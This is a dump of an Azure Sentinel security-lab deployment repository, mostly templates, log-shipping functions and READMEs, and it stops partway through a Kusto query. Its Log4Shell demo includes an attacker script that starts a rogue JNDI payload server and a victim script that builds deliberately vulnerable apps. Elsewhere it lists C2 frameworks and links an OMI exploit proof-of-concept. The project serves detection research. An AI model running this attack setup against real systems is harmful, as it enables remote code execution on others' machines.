├── .gitignore ├── LICENSE ├── MSSentinel2GoUtils.psm1 ├── README.md ├── grocery-list ├── CEF-Log-Analytics-Agent │ ├── README.md │ ├── azuredeploy.json │ ├── samples │ │ ├── cef_replace.yaml │ │ └── paloAltoMortoRDPRequest.yaml │ └── uidefinition.json ├── Custom-Logs-Pipeline │ ├── README.md │ ├── azuredeploy.json │ └── functionApp │ │ ├── azuredeploy.json │ │ ├── functionAppPackage.zip │ │ └── functionAppPackage │ │ ├── .gitignore │ │ ├── AzureLogAnalytics │ │ ├── function.json │ │ └── run.ps1 │ │ ├── HTTPTrigger │ │ ├── function.json │ │ └── run.ps1 │ │ ├── Orchestrator │ │ ├── function.json │ │ └── run.ps1 │ │ ├── host.json │ │ ├── profile.ps1 │ │ ├── proxies.json │ │ └── requirements.psd1 ├── Deception │ ├── README.md │ ├── azuredeploy.json │ └── honeytokenSolution.json ├── Linux │ ├── README.md │ ├── azuredeploy.json │ ├── demos │ │ ├── CVE-2021-38647-OMI │ │ │ ├── README.md │ │ │ ├── azuredeploy.json │ │ │ └── uidefinition.json │ │ ├── CVE-2021-44228-Log4Shell │ │ │ ├── README.md │ │ │ ├── Set-Up-Attacker.sh │ │ │ ├── Set-Up-Victim.sh │ │ │ └── azuredeploy.json │ │ └── Sysmon-For-Linux │ │ │ ├── README.md │ │ │ ├── azuredeploy.json │ │ │ └── uidefinition.json │ └── uidefinition.json ├── Win10-AD-ADFS │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-AD-MXS │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-AD-WEC │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-AD │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-LDAPFW │ ├── README.md │ ├── azuredeploy.json │ └── linkedtemplates │ │ └── customScriptExtension.json ├── Win10-PAN-FW │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-RPCFW │ ├── README.md │ ├── azuredeploy.json │ └── linkedtemplates │ │ └── customScriptExtension.json ├── Win10 │ ├── README.md │ ├── azuredeploy.json │ ├── demos │ │ ├── README.md │ │ ├── Sysmon-For-Windows │ │ │ └── README.md │ │ ├── Win10-Azure-Sentinel-Basic.json │ │ ├── Win10-DCR-AzureResource.json │ │ └── Win10-DCR-DeploymentScript.json │ └── uidefinition.json └── custom-log-pipeline │ ├── README.md │ ├── azuredeploy.json │ ├── linkedtemplates │ └── customScript.json │ ├── logstash │ ├── Dockerfile │ ├── config │ │ └── logstash.yml │ ├── docker-compose.yml │ ├── pipeline │ │ ├── eventhub-input.conf │ │ ├── json-file-input.conf │ │ ├── loganalytics-output-usgov.conf │ │ └── loganalytics-output.conf │ └── scripts │ │ └── logstash-entrypoint.sh │ ├── scripts │ ├── Get-Security-Datasets.sh │ └── Install-Logstash.sh │ └── uidefinition.json ├── microsoft-sentinel ├── README.md ├── azuredeploy.json ├── azuredeploy.parameters.json ├── linkedtemplates │ ├── alerts │ │ └── scheduledAlerts.json │ ├── customScript.json │ ├── customScriptExtension.json │ ├── data-collection-rules │ │ ├── association.json │ │ ├── creation-azureresource.json │ │ ├── creation-deploymentscript.json │ │ └── rules │ │ │ ├── ossem-attack │ │ │ ├── README.md │ │ │ ├── active-directory.xml │ │ │ ├── command.xml │ │ │ ├── file.xml │ │ │ ├── logon-session.xml │ │ │ ├── network-share.xml │ │ │ ├── network-traffic.xml │ │ │ ├── ossem-attack.json │ │ │ ├── process.xml │ │ │ ├── scheduled-job.xml │ │ │ ├── service.xml │ │ │ ├── user-account.xml │ │ │ └── windows-registry.xml │ │ │ └── palantir │ │ │ ├── ADFS.xml │ │ │ ├── Account-Lockout.xml │ │ │ ├── Account-Management.xml │ │ │ ├── Active-Directory.xml │ │ │ ├── Application-Crashes.xml │ │ │ ├── Applocker.xml │ │ │ ├── Authentication.xml │ │ │ ├── Autoruns.xml │ │ │ ├── Bits-Client.xml │ │ │ ├── Certificate-Authority.xml │ │ │ ├── Code-Integrity.xml │ │ │ ├── DNS.xml │ │ │ ├── Device-Guard.xml │ │ │ ├── Drivers.xml │ │ │ ├── Duo-Security.xml │ │ │ ├── EMET.xml │ │ │ ├── Event-Log-Diagnostics.xml │ │ │ ├── Explicit-Credentials.xml │ │ │ ├── Exploit-Guard-ASR.xml │ │ │ ├── Exploit-Guard-CFA.xml │ │ │ ├── Exploit-Guard-EP.xml │ │ │ ├── Exploit-Guard-NP.xml │ │ │ ├── External-Devices.xml │ │ │ ├── Firewall.xml │ │ │ ├── Group-Policy-Errors.xml │ │ │ ├── Kerberos.xml │ │ │ ├── Log-Deletion-Security.xml │ │ │ ├── Log-Deletion-System.xml │ │ │ ├── MSI-Packages.xml │ │ │ ├── Microsoft-Office.xml │ │ │ ├── NTLM.xml │ │ │ ├── Object-Manipulation.xml │ │ │ ├── Operating-System.xml │ │ │ ├── Powershell.xml │ │ │ ├── Print.xml │ │ │ ├── Privilege-Use.xml │ │ │ ├── Process-Execution.xml │ │ │ ├── README.md │ │ │ ├── Registry.xml │ │ │ ├── Services.xml │ │ │ ├── Shares.xml │ │ │ ├── Smart-Card.xml │ │ │ ├── Software-Restriction-Policies.xml │ │ │ ├── Sysmon.xml │ │ │ ├── System-Time-Change.xml │ │ │ ├── Task-Scheduler.xml │ │ │ ├── Terminal-Services.xml │ │ │ ├── WMI.xml │ │ │ ├── Windows-Defender.xml │ │ │ ├── Windows-Diagnostics.xml │ │ │ ├── Windows-Updates.xml │ │ │ └── Wireless.xml │ ├── data-connectors │ │ ├── README.md │ │ ├── aatp.json │ │ ├── allConnectors.json │ │ ├── awsCloudTrail.json │ │ ├── azureADDiagnosticSettings.json │ │ ├── azureADIdentityProtection.json │ │ ├── azureActivityLog.json │ │ ├── azureSecurityCenter.json │ │ ├── dnsAnalytics.json │ │ ├── m365defender.json │ │ ├── m365defenderAPI.json │ │ ├── mcas.json │ │ ├── mdatp.json │ │ ├── office365.json │ │ ├── officeATP.json │ │ ├── securityEvents.json │ │ ├── syslogCollection.json │ │ ├── threatIntelligence.json │ │ └── windowsFirewall.json │ ├── log-analytics │ │ ├── additionalSolutions.json │ │ ├── functions.json │ │ ├── iisLogsDataSource.json │ │ ├── syslogDataSources.json │ │ └── winDataSources.json │ ├── parsers │ │ ├── winLDAPFWLogs.json │ │ └── winRPCFWLogs.json │ └── security-center │ │ └── winSecurityAuditing.json ├── scripts │ ├── Create-DataCollectionRules.ps1 │ └── Enable-ScheduledAlerts.ps1 └── uidefinition.json └── resources ├── images ├── cef-log-analytics-agent_01_azure_sentinel.PNG ├── cef-log-analytics-agent_02_cef_data_connector.PNG ├── cef-log-analytics-agent_03_sample_cef_event.PNG ├── cef-log-analytics-agent_04_cef_azure_bastion.png ├── cef-log-analytics-agent_05_custom_cef_event.PNG ├── lab_environment_omigod.png ├── linux-sysmon-azure-sentinel.png ├── linux-sysmon-service-status.png ├── linux-sysmon-tail-syslog.png ├── linux-sysmon-tail-sysmonlogview.png ├── linux-sysmon-template-params.png ├── log4jshell-deployment-resources.png ├── log4jshell-trigger-rce-basicjar-reverseshell-pcap.png ├── log4jshell-trigger-rce-basicjar-reverseshell3.png ├── log4jshell-trigger-rce-basicjar-reverseshell4.png ├── log4jshell-trigger-rce-basicjar-sentinel-file-creation.png ├── log4jshell-trigger-rce-basicjar-sysmon-process-create.png ├── log4jshell-validate-sysmon.png ├── logo.png ├── logo2.png ├── oms_scx_verbose_logging.png ├── sysmon-azure-sentinel-query.png ├── sysmon-azure-sentinel.png ├── win10-ad-mxs_01_exchange_admin_center_login.png ├── win10-ad-mxs_02_exchange_admin_center_portal.png ├── win10-ad-mxs_03_owa_login.png ├── win10-ad-mxs_04_owa_inbox.png ├── win10-ad-mxs_05_owa_new_message.png ├── win10-ad-mxs_06_owa_message_received.png ├── win10-ldapfw_check_events.png ├── win10-ldapfw_query_ldap_firewall.png ├── win10-rpcfw_block_replication.png ├── win10-rpcfw_block_replication_event.png ├── win10-rpcfw_check_events.png ├── win10-rpcfw_check_mssentinel.png ├── win10-rpcfw_forwarded_events.png ├── win10-rpcfw_mk_dcsync.png ├── win10-rpcfw_mk_dcsync_execution.png ├── win10-rpcfw_query_rpcfirewall_limit10.png ├── win10-rpcfw_query_rpcfirewall_where_replication.png ├── win10-rpcfw_update_rules.png ├── win10-rpcfw_windows_subscriptions.png └── win10-rpcfw_windows_subscriptions_queries.png ├── samples ├── analytic-rules │ └── sandcats.json ├── data │ ├── dataset-sample-one.tar.gz │ ├── dataset-sample-small.tar.gz │ └── dataset-sample-two.tar.gz └── kafkacat │ └── kafkacat-Example.conf └── scripts ├── Convert-AnalyticRules.py ├── Get-AnalyticRules.sh ├── Get-DataConnectors.sh ├── Get-DataSources.sh ├── Grant-AzADAppPermissions.ps1 ├── Kafkacat-Mordor-Eventhub.sh ├── New-AzADAppRegistration.ps1 ├── New-ManagedIdentity.ps1 ├── Post-AnalyticRules.sh ├── Post-AnalyticRules_Backup.sh └── Set-WinEventCollectionTier.sh /.gitignore: -------------------------------------------------------------------------------- 1 | **/scratchpad.ps1 2 | -------------------------------------------------------------------------------- /MSSentinel2GoUtils.psm1: -------------------------------------------------------------------------------- 1 | $scripts = @(Get-ChildItem -Path $PSScriptRoot\resources\scripts\*.ps1 -ErrorAction SilentlyContinue) 2 | 3 | foreach ($script in $scripts) { 4 | try { 5 | . $script.FullName 6 | } catch { 7 | Write-Error "Failed to import $($script.FullName): $_" 8 | } 9 | } -------------------------------------------------------------------------------- /grocery-list/CEF-Log-Analytics-Agent/samples/cef_replace.yaml: -------------------------------------------------------------------------------- 1 | SRCTESTIP: 1.2.3.4 2 | DSTTESTIP: 10.0.0.1 -------------------------------------------------------------------------------- /grocery-list/CEF-Log-Analytics-Agent/samples/paloAltoMortoRDPRequest.yaml: -------------------------------------------------------------------------------- 1 | name: PAN Morto RDP Request 2 | platform: Palo Alto Networks 3 | priority: 4 | facility: local4 5 | level: warn 6 | event: 0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=DATETIME deviceExternalId=RANDOMID src=SRCTESTIP dst=DSTTESTIP sourceTranslatedAddress=DSTTESTIP destinationTranslatedAddress=SRCTESTIP cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0 -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/README.md: -------------------------------------------------------------------------------- 1 | # Custom Logs Pipeline 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FCustom-Logs-Pipeline%2Fazuredeploy.json) 4 | 5 | ## Send Data 6 | 7 | ### Define Orchestrator Uri 8 | 9 | ```PowerShell 10 | $orchestrator = 'https://.azurewebsites.net/api/orchestrators/Orchestrator' 11 | ``` 12 | 13 | ### Prepare Request 14 | 15 | ```PowerShell 16 | $SimulationRequest = @{ 17 | title = 'Proof of Concept' 18 | destination = 'AzureLogAnalytics' 19 | datasets = @( 20 | @{ 21 | number = 1 22 | eventLogUrl = 'https://github.com/OTRF/Security-Datasets/raw/SecurityDatasets2.0/datasets/atomic/windows/190518-RegKeyModification-WDigestDowngrade/WORKSTATION6_Windows_Security.zip' 23 | eventSourceName = 'Microsoft-Windows-Security-Auditing' 24 | } 25 | ) 26 | } 27 | ``` 28 | 29 | ### Prepare Body 30 | 31 | ```PowerShell 32 | $params = @{ 33 | Uri = $orchestrator 34 | Method = "Post" 35 | Body = $shippingRequest | Convertto-json -Depth 10 36 | ContentType = 'application/json' 37 | Verbose = $true 38 | } 39 | ``` 40 | 41 | ### Send Request 42 | 43 | ```PowerShell 44 | Invoke-RestMethod @params 45 | ``` -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage.zip -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Azure Functions artifacts 3 | bin 4 | obj 5 | appsettings.json 6 | local.settings.json 7 | .vscode 8 | .funcignore -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/AzureLogAnalytics/function.json: -------------------------------------------------------------------------------- 1 | { 2 | "bindings": [ 3 | { 4 | "name": "shipping", 5 | "type": "activityTrigger", 6 | "direction": "in" 7 | } 8 | ] 9 | } -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/HTTPTrigger/function.json: -------------------------------------------------------------------------------- 1 | { 2 | "bindings": [ 3 | { 4 | "authLevel": "anonymous", 5 | "name": "Request", 6 | "type": "httpTrigger", 7 | "direction": "in", 8 | "route": "orchestrators/{FunctionName}", 9 | "methods": [ 10 | "post", 11 | "get" 12 | ] 13 | }, 14 | { 15 | "type": "http", 16 | "direction": "out", 17 | "name": "Response" 18 | }, 19 | { 20 | "name": "starter", 21 | "type": "durableClient", 22 | "direction": "in" 23 | } 24 | ] 25 | } 26 | -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/HTTPTrigger/run.ps1: -------------------------------------------------------------------------------- 1 | using namespace System.Net 2 | 3 | # Input bindings are passed in via param block. 4 | param($Request, $TriggerMetadata) 5 | 6 | # Write to the Azure Functions log stream. 7 | Write-Host "PowerShell HTTP trigger function processed a request." 8 | 9 | $FunctionName = $Request.Params.FunctionName 10 | $OrchestratorInputs = $Request.Body 11 | 12 | if ($OrchestratorInputs -is [HashTable]) { 13 | Write-Host "Converting HashTable to JSON object" 14 | $OrchestratorInputs = $OrchestratorInputs | ConvertTo-Json -Depth 10 15 | } 16 | 17 | $InstanceId = Start-NewOrchestration -FunctionName $FunctionName -InputObject $OrchestratorInputs 18 | Write-Host "Started orchestration with ID = '$InstanceId'" 19 | 20 | $Response = New-OrchestrationCheckStatusResponse -Request $Request -InstanceId $InstanceId 21 | Push-OutputBinding -Name Response -Value $Response -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/Orchestrator/function.json: -------------------------------------------------------------------------------- 1 | { 2 | "bindings": [ 3 | { 4 | "name": "Context", 5 | "type": "orchestrationTrigger", 6 | "direction": "in" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/Orchestrator/run.ps1: -------------------------------------------------------------------------------- 1 | param($Context) 2 | 3 | $ErrorActionPreference = "Stop" 4 | 5 | $dataShippingRequest = $Context.Input | ConvertFrom-Json -ASHashTable 6 | 7 | # Set output variable to aggregate all outputs 8 | $output = [ordered]@{} 9 | 10 | # Current event providers that would send data to a built-in table 11 | $eventToTable = @{ 12 | 'Microsoft-Windows-Sysmon' = "WindowsEvent" 13 | 'Service Control Manager' = 'WindowsEvent' 14 | 'Microsoft-Windows-Directory-Services-SAM' = 'WindowsEvent' 15 | 'Microsoft-Windows-WMI-Activity' = 'WindowsEvent' 16 | 'Microsoft-Windows-Security-Auditing' = 'SecurityEvent' 17 | } 18 | 19 | # Generating simulation id 20 | $newGuid = (new-guid).guid 21 | 22 | # Defining durable activity name 23 | $destinationTable = @('AzureLogAnalytics') 24 | $destinationSet = $dataShippingRequest.destination 25 | if ($destinationSet -notin $destinationTable) { 26 | Write-Error "[!] $destinationSet not allowed. Only 'AzureLogAnalytics' allowed." 27 | } 28 | else { 29 | $durableActivityName = $destinationSet 30 | } 31 | 32 | $output = @{ 33 | Title = $dataShippingRequest.title 34 | executions = [ordered]@{} 35 | } 36 | 37 | foreach ($dataSample in $dataShippingRequest.datasets) { 38 | # Set table name 39 | if ($eventToTable.ContainsKey($dataSample.eventSourceName)){ 40 | $tableName = $eventToTable[$dataSample.eventSourceName] 41 | } 42 | else { 43 | $tableName = "CustomTable" 44 | } 45 | 46 | # Preparing execution 47 | $executorInput = @{ 48 | EventLogUrl = $dataSample.eventLogUrl 49 | TableName = $tableName 50 | SimulationId = $newGuid 51 | } | ConvertTo-Json 52 | 53 | Write-Host ($executorInput | Out-String) 54 | 55 | # Invoke activity function 56 | $output['executions']["$($dataSample.number)"] = Invoke-DurableActivity -FunctionName $durableActivityName -Input $executorInput | ConvertTo-Json -Depth 1 57 | } 58 | $output -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/host.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "2.0", 3 | "logging": { 4 | "applicationInsights": { 5 | "samplingSettings": { 6 | "isEnabled": true, 7 | "excludedTypes": "Request" 8 | } 9 | } 10 | }, 11 | "extensionBundle": { 12 | "id": "Microsoft.Azure.Functions.ExtensionBundle", 13 | "version": "[2.*, 3.0.0)" 14 | }, 15 | "managedDependency": { 16 | "enabled": true 17 | } 18 | } -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/profile.ps1: -------------------------------------------------------------------------------- 1 | # Azure Functions profile.ps1 2 | # 3 | # This profile.ps1 will get executed every "cold start" of your Function App. 4 | # "cold start" occurs when: 5 | # 6 | # * A Function App starts up for the very first time 7 | # * A Function App starts up after being de-allocated due to inactivity 8 | # 9 | # You can define helper functions, run commands, or specify environment variables 10 | # NOTE: any variables defined that are not environment variables will get reset after the first execution 11 | 12 | # Authenticate with Azure PowerShell using MSI. 13 | # Remove this if you are not planning on using MSI or Azure PowerShell. 14 | #if ($env:MSI_SECRET) { 15 | # Disable-AzContextAutosave -Scope Process | Out-Null 16 | # Connect-AzAccount -Identity 17 | #} 18 | 19 | # Uncomment the next line to enable legacy AzureRm alias in Azure PowerShell. 20 | # Enable-AzureRmAlias 21 | 22 | # You can also define functions or aliases that can be referenced in any of your PowerShell functions. 23 | -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/proxies.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "http://json.schemastore.org/proxies", 3 | "proxies": {} 4 | } 5 | -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/requirements.psd1: -------------------------------------------------------------------------------- 1 | # This file enables modules to be automatically managed by the Functions service. 2 | # See https://aka.ms/functionsmanageddependency for additional information. 3 | # 4 | @{ 5 | # For latest supported version, go to 'https://www.powershellgallery.com/packages/Az'. 6 | # To use the Az module in your function app, please uncomment the line below. 7 | # 'Az' = '6.*' 8 | } -------------------------------------------------------------------------------- /grocery-list/Deception/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Azure Key Vault Honey Tokens 2 | 3 | ## Create Unique Azure Function Application Name 4 | 5 | ```PowerShell 6 | $functionAppName = (-join ('honeytoken',-join ((65..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}))).ToLower() 7 | ``` -------------------------------------------------------------------------------- /grocery-list/Linux/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Linux (Ubuntu, CentOS, Red Hat) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * Linux VMs 12 | * `Ubuntu` 13 | * `Centos` [OPTIONAL] 14 | * `Red hat` [OPTIONAL] 15 | * Windows [Microsoft Monitoring Agent](https://docs.microsoft.com/en-us/services-hub/health/mma-setup) installed 16 | * It connects to the Microsoft Log Analytics workspace define in the template. 17 | * Syslog Data Connection enabled 18 | * Linux Syslog Facilities 19 | * `auth` 20 | * `authpriv` 21 | * `cron` 22 | * `daemon` 23 | * `ftp` 24 | * `kern` 25 | * `user` 26 | * [OPTIONAL] Command and Control (c2) options: 27 | * `empire` 28 | * `covenant` 29 | * `caldera` 30 | * `metasploit` 31 | * `shad0w` 32 | -------------------------------------------------------------------------------- /grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-38647 Research Lab Environment 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fdemos%2FCVE-2021-38647-OMI%2Fazuredeploy.json) 4 | 5 | ## Metadata 6 | 7 | * **Author:** [Roberto Rodriguez (@Cyb3rWard0g)](https://twitter.com/Cyb3rWard0g) 8 | * **Deployment time:** 5mins 9 | * **Initial time for log collection (Syslog):** 5-10 mins 10 | 11 | ## Grocery Items 12 | 13 | * Microsoft Sentinel 14 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 15 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 16 | * Linux VMs 17 | * `Ubuntu 20` 18 | * [OMS Agent for Linux](https://github.com/microsoft/OMS-Agent-for-Linux) installed 19 | * It connects to the Microsoft Log Analytics workspace defined in the template. 20 | * [OMI version 1.6.8.0](https://github.com/microsoft/omi/releases/tag/v1.6.8-0) installed 21 | * [Syslog Data Connector](https://docs.microsoft.com/en-us/azure/sentinel/connect-syslog) enabled 22 | * Linux Syslog Facilities collected 23 | * `user` 24 | * [OMS Auditd Plugin installed](https://github.com/microsoft/OMS-Auditd-Plugin) 25 | * [AUOMS outconf](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/auoms-outconf/syslog.conf) 26 | * [AUOMS rules](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/auoms-rules/mstic-research.rules) 27 | 28 | ## Validate Environment 29 | 30 | ssh to boxes deployed and confirm: 31 | * Version of OMI is at `1.6.8.0` 32 | * Ports 5986 and 5985 are open 33 | * Test a [basic POC](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure) 34 | 35 | ![](../../../../resources/images/lab_environment_omigod.png) 36 | 37 | ## Additional Telemetry - SCX Verbose Logging 38 | 39 | Set logging with the following commands: 40 | 41 | ``` 42 | /opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose 43 | ``` 44 | 45 | Explore messages 46 | 47 | ``` 48 | tail -f /var/opt/microsoft/scx/log/scx.log 49 | ``` 50 | 51 | ![](../../../../resources/images/oms_scx_verbose_logging.png) 52 | 53 | Set all logging back to `INFO` 54 | 55 | ``` 56 | /opt/microsoft/scx/bin/tools/scxadmin -log-set all intermediate 57 | ``` 58 | -------------------------------------------------------------------------------- /grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/Set-Up-Attacker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: MIT 5 | 6 | # *********** Install Docker and Docker-Compose *********** 7 | ./Install-Docker.sh 8 | 9 | # *********** Cloning log4shell Lab *************** 10 | git clone https://github.com/Cyb3rWard0g/log4jshell-lab /opt/log4jshell-lab 11 | 12 | # *********** Instal Pip3 ******** 13 | apt install -y python3-pip 14 | 15 | cd /opt/log4jshell-lab/attacker/dns-server 16 | pip3 install -r Requirements.txt 17 | 18 | # *********** Build and start Rogue JNDI ************* 19 | HOST_IP=$(ip route get 1 | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | tail -1) 20 | 21 | # *********** Deploy Lab Environment *********** 22 | cd /opt/log4jshell-lab/attacker/rogue-jndi 23 | 24 | docker build . -t rogue-jndi 25 | docker run --rm -tid --name rogue-jndi -e PAYLOAD_IP=$HOST_IP -p 1389:1389 -p 8888:8888 rogue-jndi -------------------------------------------------------------------------------- /grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/Set-Up-Victim.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: MIT 5 | 6 | # *********** Install Docker and Docker-Compose *********** 7 | ./Install-Docker.sh 8 | 9 | # *********** Cloning log4shell Lab *************** 10 | git clone https://github.com/Cyb3rWard0g/log4jshell-lab /opt/log4jshell-lab 11 | 12 | # *********** Install Tomcat ************** 13 | cd /opt/log4jshell-lab/victim/tomcat 14 | sh Install-Tomcat.sh 15 | 16 | # *********** Compile Vulnerable Applications ************** 17 | cd /opt/log4jshell-lab/victim/vuln-apps 18 | chmod +x Compile-Apps.sh 19 | sh Compile-Apps.sh 20 | 21 | # Restart Tomcat Service 22 | service tomcat stop 23 | service tomcat start -------------------------------------------------------------------------------- /grocery-list/Linux/demos/Sysmon-For-Linux/README.md: -------------------------------------------------------------------------------- 1 | # Sysmon For Linux Lab Environment 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fdemos%2FSysmon-For-Linux%2Fazuredeploy.json/createUIDefinitionUri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fdemos%2FSysmon-For-Linux%2Fuidefinition.json) 4 | 5 | ## Metadata 6 | 7 | * **Author:** [Roberto Rodriguez (@Cyb3rWard0g)](https://twitter.com/Cyb3rWard0g) 8 | * **Deployment time:** 5mins 9 | * **Initial time for log collection (Syslog):** 5-10 mins 10 | 11 | ## Grocery Items 12 | 13 | * Microsoft Sentinel 14 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 15 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 16 | * Linux VMs 17 | * Distro: `Ubuntu 18.04.6 LTS` - Kernel release: `5.4.0-1059-azure ` 18 | * Distro: `Centos 8.2.2004` - Kernel release: `4.18.0-193.28.1.el8_2.x86_64` 19 | * Distro: `Red Hat 8.2` - Kernel release: `4.18.0-193.65.2.el8_2.x86_64` 20 | * [Log Analytics Agent for Linux](https://github.com/microsoft/OMS-Agent-for-Linux) installed 21 | * It connects to the Microsoft Log Analytics workspace defined in the template. 22 | * [Syslog Data Connector](https://docs.microsoft.com/en-us/azure/sentinel/connect-syslog) enabled 23 | * Linux Syslog Facilities collected 24 | * `user` 25 | * [Sysmon for Linux installed]() 26 | * [Sysmon for Linux installer]() 27 | * [Sysmon configuration]() 28 | 29 | ## Validate Environment 30 | 31 | ssh to boxes deployed and confirm the `Sysmon` service is running: 32 | 33 | ```bash 34 | systemctl status sysmon 35 | ``` 36 | 37 | ![](../../../../resources/images/linux-sysmon-service-status.png) 38 | 39 | ## Explore Syslog Events 40 | 41 | You can explore Sysmon events from the Syslog log. 42 | 43 | ```bash 44 | tail –f /var/log/Syslog 45 | ``` 46 | 47 | ![](../../../../resources/images/linux-sysmon-tail-syslog.png) 48 | 49 | ## Explore Sysmon Events via sysmonLogView 50 | 51 | Sysmon also comes with a binary named sysmonLogView to explore sysmon events in a friendly format. Run the following commands to explore Sysmon event id 1 (ProcessCreate) events locally: 52 | 53 | ```bash 54 | sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView -e 1 55 | ``` 56 | 57 | ![](../../../../resources/images/linux-sysmon-tail-sysmonlogview.png) 58 | 59 | ## Explore Events in Microsoft Sentinel 60 | 61 | You can query Sysmon for Linux logs by using the Syslog table with the following Kusto query: 62 | 63 | ``` 64 | Syslog 65 | | extend EventID = parse_xml(SyslogMessage).Event.System.EventID 66 | | extend EventData = parse_xml(SyslogMessage).Event.EventData.Data 67 | | mv-expand bagexpansion=array EventData 68 | | evaluate bag_unpack(EventData) 69 | | extend Key=tostring(['@Name']), Value=['#text'] 70 | | evaluate pivot( 71 